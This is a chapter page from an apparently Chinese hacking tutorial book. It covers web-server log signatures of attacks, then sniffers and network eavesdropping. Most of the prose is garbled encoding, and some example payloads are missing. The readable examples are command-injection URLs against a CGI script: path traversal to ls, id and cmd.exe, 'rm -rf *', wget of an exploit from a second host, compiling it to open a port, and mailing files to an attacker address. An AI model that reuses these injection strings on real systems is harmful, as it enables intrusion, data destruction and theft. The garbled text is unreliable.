ÓÑÇéÌáʾ£ºÈç¹û±¾ÍøÒ³´ò¿ªÌ«Âý»òÏÔʾ²»ÍêÕû£¬Çë³¢ÊÔÊó±êÓÒ¼ü¡°Ë¢Ð¡±±¾ÍøÒ³£¡ÔĶÁ¹ý³Ì·¢ÏÖÈκδíÎóÇë¸æËßÎÒÃÇ£¬Ð»Ð»£¡£¡ ±¨¸æ´íÎó
ßÙßÙ¶ÁÊé ·µ»Ø±¾ÊéĿ¼ ÎÒµÄÊé¼Ü ÎÒµÄÊéÇ© TXTÈ«±¾ÏÂÔØ ½øÈëÊé°É ¼ÓÈëÊéÇ©

30Ìì´òÔìרҵºì¿Í-µÚ11ÕÂ

°´¼üÅÌÉÏ·½Ïò¼ü ¡û »ò ¡ú ¿É¿ìËÙÉÏÏ·­Ò³£¬°´¼üÅÌÉ쵀 Enter ¼ü¿É»Øµ½±¾ÊéĿ¼ҳ£¬°´¼üÅÌÉÏ·½Ïò¼ü ¡ü ¿É»Øµ½±¾Ò³¶¥²¿£¡
¡ª¡ª¡ª¡ªÎ´ÔĶÁÍꣿ¼ÓÈëÊéÇ©ÒѱãÏ´μÌÐøÔĶÁ£¡



һЩweb³ÌÐòÓÃÕâ¸ö×Ö·û£¬¿ÉÄܵ¼ÖÂÔÚIDSÈÕÖ¾ÖÐʧ°ÜµÄ¾¯¸æ£¬Ó¦¸Ã×ÐϸµÄ¼ì²éweb³ÌÐò£¬ÈÃIDS¾¯±¨Ê§°ÜµÄ¼¸ÂʽµµÍ
£¨6£©''¡¡ÇëÇó¡¡
Ó¦¸Ã¼ì²éÄãµÄÈÕÖ¾¼Ç¼ÖÐÕâÁ½¸ö×Ö·û£¬ÖÚ¶àµÄÔ­ÒòÖУ¬Ê×ÒªµÄÒ»¸öÊÇÕâ¸ö×Ö·û±íÃ÷ÁËÌí¼ÓÊý¾ÝÔÚÎļþÖС¡
Example¡¡1£º¡¡
#¡¡echo¡¡'your¡¡hax0red¡¡h0¡¡h0'¡¡¡·¡·¡¡/etc/motd¡¡£¨ÇëÇóдÐÅÏ¢ÔÚmotdÕâ¸öÎļþÖУ©¡¡
Ò»¸ö¹¥»÷Õß¿ÉÒÔÈÝÒ×µÄÓÃÏóÉÏÃæµÄÕâ¸öÇëÇó´Û¸ÄÄãµÄwebÒ³Ãæ¡£±ÈÈçÖøÃûµÄRDS¡¡exploit³£±»¹¥»÷ÕßÓÃÓÚ¸ü¸ÄwebÖ÷Ò³Ãæ¡£¡¡
Example¡¡2£º¡¡
http£º//host/something¡£php=Hi£¥20mom£¥20Im£¥20Bold£¡¡¡
Äã»á×¢Òâµ½ÕâÀïhtmlÓïÑԵıêÖ¾£¬Í¬ÑùÓÃÁË¡°¡´¡±£¬¡°¡µ¡±×Ö·û£¬ÕâÖÖ¹¥»÷²»Äܵ¼Ö¹¥»÷Õ߶Ôϵͳ½øÐзÃÎÊ£¬ËüÃÔ»óÈËÃÇÈÏΪÕâÊǸöºÏ·¨µÄÐÅÏ¢ÔÚwebÕ¾µãÖУ¨µ¼ÖÂÈËÃÇÔÚ·ÃÎÊÕâ¸öÁª½áµÄʱºò·ÃÎʵ½¹¥»÷ÕßÉ趨µÄµØÖ·£¬ÕâÖÖÇëÇó¿ÉÄܻᱻת±ä³É16½øÖƵıàÂë×Ö·ûÐÎʽ£¬Ê¹¹¥»÷µÄºÛ¼£²»ÄÇôÃ÷ÏÔ£©
£¨7£©'£¡'ÇëÇó¡¡
ÕâÖÖ×Ö·ûÇëÇó³£ÓÃÓï¶ÔSS£¨Server¡¡Side¡¡Include£©¡¡I½øÐй¥»÷£¬Èç¹û¹¥»÷ÕßÃÔ»óÓû§µã»÷±»¹¥»÷ÕßÉ趨µÄÁª½á£¬ºÍÉÏÃæµÄÒ»Ñù¡£¡¡
Example£º¡¡
http£º//host1/something¡£php=¡¡
Õâ¸öÁÐ×ÓÊǹ¥»÷Õß¿ÉÄÜ»á×öµÄ£¬ËüÈÃÒ»¸öhost2Õ¾µãÉϵÄÎļþ¿´ÆðÀ´ÊÇÀ´×ÔÓÚ¡¡host1ÉÏÃæµÄ£¨µ±È»£¬ÐèÒª·ÃÎÊÕß·ÃÎÊÕâ¸ö±»¹¥»÷ÕßÉ趨µÄÁª½á¡£ÕâÖÖÇëÇó¿ÉÄܱ»×ª»¯³É16½øÖƵıàÂëαװ£¬²»Ò×·¢ÏÖ£©¡¡
ͬʱ£¬ÕâÖÖ·½Ê½Ò²¿ÉÒÔÒÔwebÕ¾µãµÄȨÏÞÖ´ÐÐÃüÁî¡¡
Example£º¡¡
http£º//host/something¡£php=¡¡
Õâ¸öÁÐ×ÓÔÚÔ¶³ÌµÄϵͳÉÏÖ´ÐС°id'µÄÃüÁËü½«ÏÔʾÕâ¸öwebÕ¾µãÓû§µÄid£¬Í¨³£ÊÇ¡±nobody'»òÕß¡°'¡¡
ÕâÖÖÐÎʽҲÔÊÐí°üº¬Òþ²ØÎļþ¡£¡¡
Example£º¡¡
http£º//host/something¡£php=¡¡
Õâ¸öÒþ²ØÎļþ¡£htpasswd²»»á±»ÏÔʾ³öÀ´£»Apache½¨Á¢µÄ¹æÔò»á¾Ü¾øÕâÖÖÒÔ¡£ht¡¡ÐÎʽµÄÇëÇ󣬶øSSI±êÖ¾»áÈƹýÕâÖÖÏÞÖÆ£¬²¢µ¼Ö°²È«ÎÊÌâ¡¡
£¨8£©'¡¡ÕâÖÖ¹¥»÷ÓÃÓÚÊÔͼÔÚÔ¶³ÌµÄwebÓ¦ÓóÌÐòÖвåÈëPHP³ÌÐò£¬Ëü¿ÉÄÜÔÊÐíÖ´ÐÐÃüÁÕâÈ¡¾öÓÚ·þÎñÆ÷µÄÉèÖ㬺ÍÆäËûÆð×÷ÓõÄһЩÒòËØ£¨±ÈÈçphpÉèÖÃΪ°²È«Ä£Ê½£©¡¡
Example£º¡¡http£º//host/something¡£php=¡¡
ÔÚijЩ¼òµ¥µÄphpÓ¦ÓóÌÐòÖУ¬Ëü¿ÉÄÜ»áÔÚÔ¶³ÌϵͳÉÏÒÔwebÕ¾µãÓû§µÄȨÏÞÖ´Ðб¾µØÃüÁî¡¡
£¨9£©'¡®'¡¡ÇëÇó¡¡
ÕâÖÖ×Ö·ûºóÃæ³£ÓÃÔÚperlÖÐÖ´ÐÐÃüÁÕâ¸ö×Ö·ûÔÚwebÓ¦ÓóÌÐòÖв»ÊǾ­³£µÄʹÓã¬ËùÒÔ£¬Èç¹û¿´µ½ËüÔÚÄãµÄÈÕÖ¾ÖУ¬Ó¦¸Ã·Ç³£Ð¡ÐÄ¡¡
Example£º¡¡
http£º//host/something¡£cgi=¡®id¡®¡¡
Ò»¸öperlдµÄÓÐÎÊÌâµÄcgi³ÌÐò£¬»áµ¼ÖÂÖ´ÐÐidÃüÁî¡¡
ÏÂÃæÊÇÕë¶Ô¹ÜÀíԱ˵µÄ£»ÒòΪÏÖÔںܶàÍø¹Ü¶¼ÔÚ¿´Õâ¸ö£»ËùÒÔÎÒ¾õµÃÓбØҪдһµã£»µ±È»Ò²ÊÇÈÃÄãÖªµÀÄãµÄ¶ÔÊÖÓÐÄÄЩ×ÅÊýÁË£»ºÇºÇ¡£ÎÒÖ»ÊÇÂÞÁÐÁËһЩ¹¥»÷ºóµÄºÛ¼££»µ±È»²»ÄÜÂÞÁÐËùÓÐÁË
'/bin/ls'¡¡
Õâ¸öÃüÁîÇëÇóÕû¸ö·¾¶£¬ÔںܶàµÄwebÓ¦ÓóÌÐòÖж¼ÓÐÕâ¸ö©¶´£¬Èç¹ûÄãÔÚÈÕÖ¾ÖкܶàµØ·½¶¼¿´µ½ÕâÖÖÇëÇ󣬺ܴóµÄ¿ÉÄÜÐÔÊÇ´æÔÚÔ¶³ÌÖ´ÐÐÃüÁ´£¬µ«²¢²»Ò»¶¨ÊǸöÎÊÌ⣬Ҳ¿ÉÄÜÊǸö´íÎóµÄ¾¯±¨¡£ÔÙÒ»´ÎÌáÐÑ£¬Ð´ºÃµÄwebÓ¦ÓóÌÐò£¨cgi£»asp£»php¡£¡£¡£etc£©ÊÇ°²È«µÄ»ù´¡¡¡
Example£º¡¡
http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/ls£¥20¡­al£ü¡¡
http£º//host/cgi¡­bin/bad¡£cgi£¿doh=ls£¥20¡­al£»¡¡
'cmd¡£exe'¡¡
ÕâÊÇÒ»¸öwindowsµÄshell£»Ò»¸ö¹¥»÷ÕßÈç¹û·ÃÎʲ¢ÔËÐÐÕâ¸ö½Å±¾£¬ÔÚ·þÎñÆ÷ÉèÖÃÔÊÐíµÄÌõ¼þÏ¿ÉÒÔÔÚwindows»úÆ÷ÉÏ×öÈκÎÊÂÇ飬ºÜ¶àµÄÈä³æ²¡¶¾¾ÍÊÇͨ¹ý80¶Ë¿Ú£¬´«²¥µ½Ô¶³ÌµÄ»úÆ÷ÉÏ¡¡
http£º//host/scripts/something¡£asp=¡£¡£/¡£¡£/WINNT/system32/cmd¡£exe£¿dir£«e£º¡¡
'/bin/id'¡¡
ÕâÊǸö2½øÖƵÄÎļþ£¬ËüµÄÎÊÌâºÍ/bin/lsÒ»Ñù£¬Èç¹ûÄãÔÚÈÕÖ¾ÖкܶàµØ·½¶¼¿´µ½ÕâÖÖÇëÇ󣬺ܴóµÄ¿ÉÄÜÐÔÊÇ´æÔÚÔ¶³ÌÖ´ÐÐÃüÁ´£¬µ«²¢²»Ò»¶¨ÊǸöÎÊÌ⣬Ҳ¿ÉÄÜÊǸö´íÎóµÄ¾¯±¨¡£¡¡
Ëü½«ÏÔʾÊôÓÚÄĸöÓû§ºÍÊôÓÚÄĸö×é¡¡
Example£º¡¡
http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/id£ü¡¡
http£º//host/cgi¡­bin/bad¡£cgi£¿doh=id£»¡¡
'/bin/rm'¡¡
Õâ¸öÃüÁî¿ÉÒÔɾ³ýÎļþ£¬Èç¹û²»ÕýÈ·µÄʹÓÃÊǷdz£Î£Ïյġ¡
Examples£º¡¡
http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/rm£¥20¡­rf£¥20*£ü¡¡
http£º//host/cgi¡­bin/bad¡£cgi£¿doh=rm£¥20¡­rf£¥20*£»¡¡
'wget¡¡and¡¡tftp'¡¡ÃüÁî¡¡
ÕâЩÃüÁî³£±»¹¥»÷ÕßÓÃÀ´ÏÂÔØ¿ÉÄܽøÒ»²½»ñµÃÌØȨµÄÎļþ£¬wgetÊÇunixϵÄÃüÁ¿ÉÄܱ»ÓÃÀ´ÏÂÔغóÃųÌÐò£¬tftpÊÇunixºÍntϵÄÃüÁÓÃÀ´ÏÂÔØÎļþ¡£Ò»Ð©IISÈä³æͨ¹ýtftpÀ´¸´ÖÆ×ÔÉí´«²¥²¡¶¾µ½ÆäËûµÄÖ÷»ú¡¡
Examples£º¡¡
http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/path/to¡­wget/wget£¥20http£º//host2/Phantasmp¡£c£ü¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=wget£¥20http£º//¡£hwa¡­security¡£/Phantasmp¡£c£»¡¡
'cat'¡¡ÃüÁî¡¡
Õâ¸öÃüÁîÓÃÀ´²é¿´ÎļþÄÚÈÝ£¬³£ÓÃÀ´¶ÁÖØÒªµÄÐÅÏ¢£¬±ÈÈçÅäÖÃÎļþ£¬ÃÜÂëÎļþ£¬ÐÅÓÿ¨ÎļþºÍÄãÄܹ»Ïëµ½µÄÎļþ¡¡
Examples£º¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/cat£¥20/etc/motd£ü¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=cat£¥20/etc/motd£»¡¡
'echo'¡¡ÃüÁî¡¡
Õâ¸öÃüÁî³£ÓÃÓÚдÊý¾Ýµ½ÎļþÖУ¬±ÈÈç¡°index¡£html¡±¡¡
Examples£º¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/echo£¥20'fc¡­#kiwis£¥20was£¥20here'£¥20¡·¡·£¥200day¡£txt£ü¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=echo£¥20'fc¡­#kiwis£¥20was£¥20here'£¥20¡·¡·£¥200day¡£txt£»¡¡
'ps'¡¡ÃüÁî¡¡
Áгöµ±Ç°ÔËÐеĽø³Ì£¬¸æËß¹¥»÷ÕßÔ¶³ÌÖ÷»úÔËÐÐÁËÄÇЩÈí¼þ£¬ÒÔ±ã´ÓÖеõ½Ò»Ð©°²È«ÎÊÌâµÄÖ÷Ò⣬»ñµÃ½øÒ»²½µÄȨÏÞ¡¡
Examples£º¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/ps£¥20¡­aux£ü¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=ps£¥20¡­aux£»¡¡
'kill¡¡and¡¡killall'¡¡ÃüÁî¡¡
ÔÚunixϵͳÕâ¸öÃüÁîÓÃÓÚɱµô½ø³Ì£¬Ò»¸ö¹¥»÷Õß¿ÉÒÔÓÃÕâ¸öÃüÁîÀ´Í£Ö¹ÏµÍ³·þÎñºÍ³ÌÐò£¬Í¬Ê±¿ÉÒÔ²Áµô¹¥»÷Õߵĺۼ££¬Ò»Ð©exploit»á²úÉúºÜ¶àµÄ×Ó½ø³Ì¡¡
Examples£º¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/bin/kill£¥20¡­9£¥200£ü¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=kill£¥20¡­9£¥200£»¡¡
'uname'¡¡ÃüÁî¡¡
Õâ¸öÃüÁî¸æËß¹¥»÷ÕßÔ¶³Ì»úÆ÷µÄÃû×Ö£¬Ò»Ð©Ê±ºò£¬Í¨¹ýÕâ¸öÃüÁîÖªµÀwebÕ¾µãλÓÚÄĸöisp£¬Ò²ÐíÊǹ¥»÷ÕßÔø½ñ·ÃÎʹýµÄ¡£Í¨³£uname¡¡¡­aÀ´ÇëÇó£¬ÕâЩ¶¼½«¼Ç¼ÔÚÈÕÖ¾ÎļþÖС¡
Examples£º¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/uname£¥20¡­a£ü¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=uname£¥20¡­a£»¡¡
'cc£»¡¡gcc£»¡¡perl£»¡¡python£»¡¡etc¡£¡£¡£'¡¡±àÒë/½âÊÍÃüÁî¡¡
¹¥»÷Õßͨ¹ýwget»òÕßtftpÏÂÔØexploit£¬²¢ÓÃcc£»gccÕâÑùµÄ±àÒë³ÌÐò½øÐбàÒë³É¿ÉÖ´ÐгÌÐò£¬½øÒ»²½»ñµÃÌØȨ¡¡
Examples£º¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/cc£¥20Phantasmp¡£c£ü¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=gcc£¥20Phantasmp¡£c£»¡£/a¡£out£¥20¡­p£¥2031337£»¡¡
Èç¹ûÄã²é¿´ÈÕÖ¾Öз¢ÏÖÓС°perl¡±¡¡python¡±ÕâЩ˵Ã÷¿ÉÄܹ¥»÷ÕßÏÂÔØÔ¶³ÌµÄperl¡¡£»python½Å±¾³ÌÐò£¬²¢ÊÔͼ±¾µØ»ñµÃÌØȨ¡¡
'mail'¡¡ÃüÁî¡¡
¹¥»÷Õßͨ³£ÓÃÕâ¸öÃüÁϵͳµÄһЩÖØÒªÎļþ·¢µ½¹¥»÷Õß×Ô¼ºµÄÐÅÏ䣬Ҳ¿ÏÄÜÊǽøÐÐÓʼþÕ¨µ¯µÄ¹¥»÷¡¡
Examples£º¡¡http£º//host/cgi¡­bin/bad¡£cgi£¿doh=¡£¡£/¡£¡£/¡£¡£/¡£¡£/bin/mail£¥20attacker@****cnhonker¡£org£¥20¡¶¡¡
¡ºµÚ14Ìì¡»sniffer£¬½ñÌ쿪ʼ˵ËüÁË
sniffers£¨Ðá̽Æ÷£©¼¸ºõºÍinterÓÐÒ»Ñù¾ÃµÄÀúÊ·ÁË¡£ËûÃÇÊÇ×îÔçµÄÒ»¸öÔÊÐíϵͳ¹ÜÀíÔ±·ÖÎöÍøÂçºÍ²éÃ÷ÄÄÀïÓдíÎó·¢ÉúµÄ¹¤¾ß¡£µ«ÊÇÕâ¸ö¹¤¾ßÒ²¸øÎÒÃÇ´øÀ´ºÜ´óµÄ·½±ã¡£½ñÌìÎÒÃÇ¿´2¸öÎÊÌ⣺1¡£Ê²Ã´ÊÇsniffer¡¡2¡£ÈçºÎ·ÀÖ¹snifferµÄ¼àÌý¡£ËƺõÊÇì¶ÜµÄŶ£¬ºÇºÇ£¬Òª2¸ö·½Ã涼֪µÀ²ÅÄÜ°ÙÕ½°ÙʤÂï
ʲÂïÊÇsniffer¡¡£¨³­¶¨ÒåµÄ£©
ÔÚµ¥Ñ¡ÐÔÍøÂçÖУ»¡¡ÒÔÌ«Íø½á¹¹¹ã²¥ÖÁÍø·ÉÏËùÓеĻúÆ÷£»¡¡µ«ÊÇÖ»ÓÐÔ¤¶¨½ÓÊÜÐÅÏ¢°üµÄÄÇ̨¼ÆËã»ú²Å»áÏìÓ¦¡£¡¡²»¹ýÍø·ÉÏÆäËûµÄ¼ÆËã»úͬÑù»á¡¨¿´µ½¡¨Õâ¸öÐÅÏ¢°ü£»µ«ÊÇÈç¹ûËûÃDz»ÊÇÔ¤¶¨µÄ½ÓÊÜÕߣ»ËûÃÇ»áÅųýÕâ¸öÐÅÏ¢°ü¡£¡¡µ±Ò»Ì¨¼ÆËã»úÉÏÔËÐÐ×ÅsnifferµÄʱºò²¢ÇÒÍøÂç´¦ÓÚ¼àÌýËùÓÐÐÅÏ¢½»Í¨µÄ״̬£»¡¡ÄÇôÕą̂¼ÆËã»ú¾ÍÓÐÄÜÁ¦ä¯ÀÀËùÓеÄÔÚÍøÂçÉÏͨ¹ýµÄÐÅÏ¢°ü¡££¨Õâ¸öµ±È»ºÜˬÁË£©
ÄÇÄã¾ÍÓиöÎÊÌâ˭ʹÓÃÕâ¸öÄØ£¿lan/wan¡¡¹ÜÀíԱʹÓÃsniffersÀ´·ÖÎöÍøÂçÐÅÏ¢½»Í¨²¢ÇÒÕÒ³öÍøÂçÉϺδ¦·¢ÉúÎÊÌâ¡£Ò»¸ö°²È«¹ÜÀíÔ±¿ÉÒÔͬʱÓöàÖÖsniffers£»¡¡½«ËüÃÇ·ÅÖÃÔÚÍøÂçµÄ¸÷´¦£»ÐγÉÒ»¸öÈëÇÖ¾¯±¨ÏµÍ³¡£¶ÔÓÚϵͳ¹ÜÀíÔ±À´ËµsniffersÊÇÒ»¸ö·Ç³£ºÃµÄ¹¤¾ß£¬µ±È»»¹ÓÐÎÒÃÇ´ó¼ÒÁË¡£Ädz£¼ûµÄsniffers¡¡ÓÐÄÄЩÄØ£¿ºÜ¶à£¬ÎÒ³£ÓõÄÓÐSniffer¡¡Pro¡£µ±È»¿´Ò»Ð©ÎÄÕ½éÉÜÁËsnoop£¬µ«×¢ÒâÕâÊÇÔÚUNIXϵģ¬ÎÒûÔõôÓ᡹ý¡¡£¬ËùÒԾͲ»ËµÕâ¸öÁË¡£ÖÁÓÚÆäËûһЩºÃÓõģ¬ÎÒÏëÄãѧµ½ÏÖÔÚÁËÓ¦¸Ã¿ÉÒÔ×Ô¼ºÕÒÁË£¨ÉÏGOOGLE¡¡»òÊÇBAIDU¶¼¿ÉÒÔ£¬²»È»È¥¡£yahoo¡£Ò²²»´íµÄ£©¡£
ÄÇÔõô·ÀÖ¹snifferµÄ¼àÌý£¿
ÏÔ¶øÒ×¼ûµÄ£»±£»¤ÍøÂç²»ÊÜsniffer¼àÌýµÄ·½·¨¾ÍÊDz»ÒªÈÃËüÃǽøÈë¡£¡¡Èç¹ûÒ»¸öÈ˲»ÄÜͨ¹ýÄãµÄϵͳ½øÈëµÄ»°£»ÄÇôËûÃÇÎÞ·¨°²×°sniffers¡£µ±ÓÐÈË¿´ÉÏÒ»¸ö´ó¶àÊýÍøÂçͨѶÁ÷ͨµÄÖÐÐÄÇøÓò£¨·À»ðǽ»òÊÇ´úÀí·þÎñÆ÷£©Ê±£»ËûÃDZãÈ·¶¨ÕâÊÇËûÃǵĹ¥»÷Ä¿±ê²¢½«±»¼àÊÓ¡£Ò»Ð©¿ÉÄܵġ¨Êܺ¦Õß¡¨ÔÚ·þÎñÆ÷µÄÅԱߣ»Õâʱºò¸öÈËÐÅÏ¢½«±»½Ø»ñ£¨¿ÉÄÜÊǸ÷ÖÖÐÅÏ¢ÉõÖÁÊÇÃÜÂ룩
Ò»¸öºÃµÄ·½Ê½À´±£»¤ÄãµÄÍøÂç²»ÊÜsniffer¼àÊÓÊǽ«ÍøÂçÓÃÒÔÌ«Íø½ÓÏßÆ÷´úÌæÆÕͨµÄ¼¯ÏßÆ÷·Ö³É¾¡¿ÉÄܶàµÄ¶Î¡£½ÓÏßÆ÷¿ÉÒÔ·Ö¸îÄãµÄÍøÂçͨѶ²¢·Àֹÿһ¸öϵͳ¡¨¿´µ½¡¨Ã¿¸öÐÅÏ¢°ü¡£»µ´¦ÊÇÕâÖÖ¶«Î÷Ì«¹óÁË£¬Õâ¸ö»¹ÊǺÜÖØÒªµÄ
ÁíÒ»¸ö·½·¨ÊÇ£»ºÍÄÇÖÖ½ÓÏßÆ÷±È¾ÍÊǼÓÃÜÊõ¡£SnifferÒÀÈ»¿ÉÒÔ¼àÊÓµ½ÐÅÏ¢µÄ´«ËÍ£»µ«ÊÇÏÔʾµÄÊÇÂÒÂë¡£µ«Õâ¸öÓÐÎÊÌâ¾ÍÊÇÍøÂç»áÑÓ³Ù£¬µ±È»»¹ÓÐËÙ¶ÈÎÊÌâºÍʹÓÃÒ»¸öÈõ¼ÓÃÜÊõ±È½ÏÈÝÒ×±»¹¥ÆÆ¡£
ÓÃһЩÈí¼þÒ²¿ÉÒÔ°ïÖúÄã²é³öÊDz»ÊÇÓÐÈËÔÚ¼àÊÓÄ㣬±ÈÈçAntiSniff£¨ºÜСµÄ£¬µ«¿ÉÒÔɨÃèÄãµÄÍø·²¢²âÊÔһ̨¼ÆËã»úÊÇ·ñÔËÐÐÔÚ»ìÔÓģʽ£¨¼àÌýÍø·ÉÏÿ¸öÊý¾Ý°ü£©Ê²Ã´Òâ˼£¿Äã¿´¿´ÉÏÃæµÄÀàÈÝ°É£©£¬ÏÂÔØ£ºhttp£º//¡£pdasky¡£¡£cn/down¡£asp£¿id=2876&no=1
¡ºµÚ15Ìì¡»ÍøÂç¼àÌý¼¼Êõ·ÖÎö¡¡´¿ÊôÀíÂÛ
½ñÌìÎÒÃÇÏÈ˵¼¸¸ö»ù±¾¸ÅÄî¡£Ê×ÏÈ£¬ÎÒÃÇÖªµÀ£¬Ò»Ì¨½ÓÔÚÒÔÌ«ÍøÄڵļÆËã»úΪÁ˺ÍÆäËûÖ÷»ú½øÐÐͨѶ£¬ÔÚÓ²¼þÉÏÊÇÐèÒªÍø¿¨£¬ÔÚÈí¼þÉÏÊÇÐèÒªÍø¿¨Çý¶¯³ÌÐòµÄ¡£¶øÿ¿éÍø¿¨ÔÚ³ö³§Ê±¶¼ÓÐÒ»¸öΨһµÄ²»ÓëÊÀ½çÉÏÈκÎÒ»¿éÍø¿¨Öظ´µÄÓ²¼þµØÖ·£¬³ÆΪmacµØÖ·¡£Í¬Ê±£¬µ±ÍøÂçÖÐÁ½Ì¨Ö÷»úÔÚʵÏÖtcp/ipͨѶʱ£¬Íø¿¨»¹±ØÐë°ó¶¨Ò»¸öΨһµÄipµØÖ·¡£
¶ÔÎÒÃÇÀ´Ëµ£¬ä¯ÀÀÍøÒ³£¬ÊÕ·¢ÓʼþµÈ¶¼ÊǺÜƽ³££¬ºÜ¼ò±ãµÄ¹¤×÷£¬ÆäʵÔÚºǫ́ÕâЩ¹¤×÷ÊÇÒÀ*tcp/ipЭÒé×åʵÏֵģ¬´ó¼ÒÖªµÀÓÐÁ½¸öÖ÷ÒªµÄÍøÂçÌåϵ£ºOSI²Î¿¼Ä£ÐͺÍTCP/IP²Î¿¼Ä£ÐÍ£¬OSIÄ£Ðͼ´ÎªÍ¨³£ËµµÄ7²ãЭÒ飬ËüÓÉÏÂÏòÉÏ·Ö±ðΪÎïÀí²ã¡¢Êý¾ÝÁ´Â·²ã¡¢ÍøÂç²ã¡¢´«Êä²ã¡¢»á»°²ã¡¢±íʾ²ã¡¢Ó¦Óò㣬¶øtcp/ipÄ£ÐÍÖÐÈ¥µôÁ˻Ự²ãºÍ±íʾ²ãºó£¬ÓÉʣϵÄ5²ã¹¹³ÉÁË»¥ÁªÍøµÄ»ù´¡£¬ÔÚÍøÂçµÄºǫ́ĬĬµÄ¹¤×÷×Å¡£
µ±¾ÖÓòÍøÄÚ£¨ÒòΪÎÒÃÇ×î³£¼ûµ
·µ»ØĿ¼ ÉÏÒ»Ò³ ÏÂÒ»Ò³ »Øµ½¶¥²¿ ÔÞ£¨1£© ²È£¨1£©
δÔĶÁÍꣿ¼ÓÈëÊéÇ©ÒѱãÏ´μÌÐøÔĶÁ£¡
ÎÂÜ°Ìáʾ£º ο´Ð¡ËµµÄͬʱ·¢±íÆÀÂÛ£¬Ëµ³ö×Ô¼ºµÄ¿´·¨ºÍÆäËüС»ï°éÃÇ·ÖÏíÒ²²»´íŶ£¡·¢±íÊéÆÀ»¹¿ÉÒÔ»ñµÃ»ý·ÖºÍ¾­Ñé½±Àø£¬ÈÏÕæдԭ´´ÊéÆÀ ±»²ÉÄÉΪ¾«ÆÀ¿ÉÒÔ»ñµÃ´óÁ¿½ð±Ò¡¢»ý·ÖºÍ¾­Ñé½±ÀøŶ£¡